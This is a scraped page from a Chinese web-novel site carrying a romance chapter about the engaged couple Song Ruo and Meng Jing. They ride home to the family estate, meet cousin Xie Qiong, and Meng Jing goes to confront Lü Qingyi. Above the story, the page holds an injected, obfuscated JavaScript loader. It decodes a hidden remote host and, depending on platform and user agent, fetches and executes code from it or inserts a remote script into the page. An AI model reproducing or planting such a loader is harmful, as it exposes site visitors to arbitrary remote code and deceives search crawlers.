98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2ZrbG5ic2xrYm5rbGQuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一页
目录 | 设置
下一章

分卷(39(2 / 2)

加入书签 | 推荐本书 | 问题反馈 |

暌违已久的司机老杨见了两人十分热络,见了孟璟,连说好几声大小姐瘦了。

两人坐在后座。

上车之前,宋若就想起了上次她还在《温柔待我》剧组那会儿,孟老爷子突然归国,召两人回家,她不小心睡着,结果让孟爷爷等了一小时的事。为了避免历史重演,从来不喝茶的她上车前喝了大半杯绿茶,无论如何都要打起精神。

然而,这次她清醒着,抹香鲸却不知怎的与周公约起了会。车驶到半途,右肩微微一沉,她低头一看,是孟璟靠了过来,呼吸均匀,早已睡着。脸上有轻微的疲倦。这一天确实都是她的重头戏。宋若没有移开位子,任她靠着,就当报答她上回的宠文桥段。

她看着靠在肩上的小脸,脑海里有许多想法蜂拥而出。

现在她信孟璟是认真对待这份拍摄的工作。并没有把所谓拍电影想象成很好玩的逃避之所。

而别的呢。

她所谓的我要追你,算是怎么回事。

秦萌当天提出的条件是,假如她坚持到大学毕业不和孟璟结婚,她就把自己那个梦境她所记得的细节都说给她听。

因此也有可能,小娇妻所谓的表白都是烟幕弹,现在顾及着父母,没办法在孟璟身边,所以用这个牵制着她。

三个人是正向剧情原来的轨道靠拢,还是,就要打出不一样的分支结局?

所以说看小说太少这个事情,真是很伤脑筋。

纷乱的思绪被孟璟一声轻哼打断,她眉头轻蹙着,似乎哪里有痛楚,脸往宋若颈窝拱了拱。

脖颈的皮肤被抹香鲸温热湿润的呼吸所侵染,宋若再次听到轻轻的唔地一声,她心中猛然一凛,屏住呼吸,右手轻轻搭上了鲸鱼的脊背。

第48章 喜欢

车子一颠簸,孟璟醒过来了。这次是靠在未婚妻怀里醒来的。她有点儿后悔醒早了。假如多睡会儿,那就可以在温柔乡里多沉溺一阵子。只不过宋若本身也睡着了,估计睡得很沉,这样猛地一颠她都没醒。孟璟不管三七二十一,继续窝在她怀里装睡。脸埋在有着淡淡馨香的颈窝,双手还包抄过去,搂住了小腰,抿嘴而笑。

孟家后花园里一棵银桂开得早,冷香浸透了方圆几里地。

芬姨在那儿要打些桂花下来做桂花糕和糖渍桂花。谢琼替她拿了张叠好的桌布过去。芬姨拿竹竿略抽打几下,桂花扑簌簌往下落的当儿,前门汽车响。芬姨回头看她一眼,笑道表小姐过去吧,她们回来了。

车子一顿,宋若动了动。孟璟只恨家太近,到得太早,依依不舍松开自己的爪子,坐到侧边,擦擦脸,抱着双臂,清了清嗓子,唉了声某些小懒虫,坐车就要睡觉。

宋若点头不好意思。

孟璟忍住笑意算啦,你也很辛苦。

久别重逢不仅限于人与人,人与万物都差不离。小道两旁的花圃依旧开着娇艳欲滴的花朵。高大而苍翠的树木在薄薄的暮色里显得可爱。进屋看到表姐时,孟璟也没有不愉快。外祖父过生,总不能禁止她来祝寿。况且她还沉浸在刚才偷香窃玉的小快乐里,倒了杯水,递给未婚妻。

谢琼却差不多同时倒了杯水递了过来,两只杯子相碰,发出叮的一声脆响。

孟璟嘶了声,朝表姐看了看。

都自己倒吧。宋若越过两人的手,另外倒了一杯。

孟璟轻轻哼了一声,将杯子撤回去自己喝。

芬姨已经捧着小筐桂花进来,宋若和孟璟都朝她打招呼。芬姨答应着,去厨房捧了备好的水果出来,宋若问她芬姨,爷爷呢?

带你们姑姑看展去了,还没回。芬姨笑盈盈地答。

宋若点了点头,没说话。反而看向孟璟你要不要出去一趟?

孟璟奇道你怎么知道我要出去?眨眨右眼,心有灵犀嘛?

宋若顿了顿,才问要不要我陪你?

孟璟正喝水,呛了一呛,咳嗽起来。

宋若放在膝盖上的手,似乎是想抬起来,最终并没有,握成拳放着。

孟璟咳嗽完,朝她脸上仔细打量了会儿,弯了弯桃花眼,我老婆啊,真是一分钟都不想离开我呢。

宋若也没反驳,听孟璟又道不用啦,这个我去解决就好。

孟璟上楼捣鼓了会儿,还换了身衣服,穿着一身黑下来,贴身的衣物勾勒出美好身型,她的四肢都极为纤长,黑色又加强了这种效果,还渲染出股子飒爽。黑色是适合她的颜色。她脚步轻快地下楼,到了楼梯口,朝宋若飞了个吻我走了啊老婆,等我回来。

宋若点点头,起身送她到门口,见她去侧边的小车库推了她的小机车出来,蹙眉道不让杨叔送你去么?

孟璟本来要往头上戴头盔,咦了声,脸上的笑意渐次加深,老婆?

宋若冷着脸。

孟璟脸上的笑意愈深这怎么好,结婚了我不得给你管得毫无自由,怎么办我好怕啊。

宋若闭了闭眼,转身回了屋内。

门外不多时响起机车发动的声音,宋若背靠着门,叹口气,往屋内走。

谢琼坐在沙发上一直没动,目睹了这一切的发生。当宋若走到近前,她才开口问了一句孟璟去哪里?

宋若道可能是去拜访一下温医生。

谢琼顿了顿,做出了然的神色,没说什么,虚伸了一伸手,示意她坐。

她显然想聊聊,宋若说坐了一下午车,不坐了。

谢琼建议道去花园走走?

是你吧。孟璟站在机车侧边,捧着头盔,朝对面的女生扬了扬下巴。

她拜访的不是温医生。她拜访的是吕清義。她让对方带几个人过来,没想到吕清義却是单刀赴会,脸上的红晕来不及汇聚成形,就被讶异取代了,反问了一句什么是我?

那个背后下黑手的,是你手下吧。

女生穿着与自身气质完全不合的粉裙子,可是因为青春飞扬的缘故,依旧是美丽的。孟璟不知从哪里弄到的她的手机号,一邀约她就出来了,为自己今天没有去外地玩耍感到庆幸。然而孟璟这句话一说出口,她的脸色就由躲闪别扭变成了苍白和微怒,但是经过一瞬间的纠结,她说我只是想给她一个教训你伤得重不重?

孟璟淡淡问,为什么要教训她。

上一页
目录
下一章
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间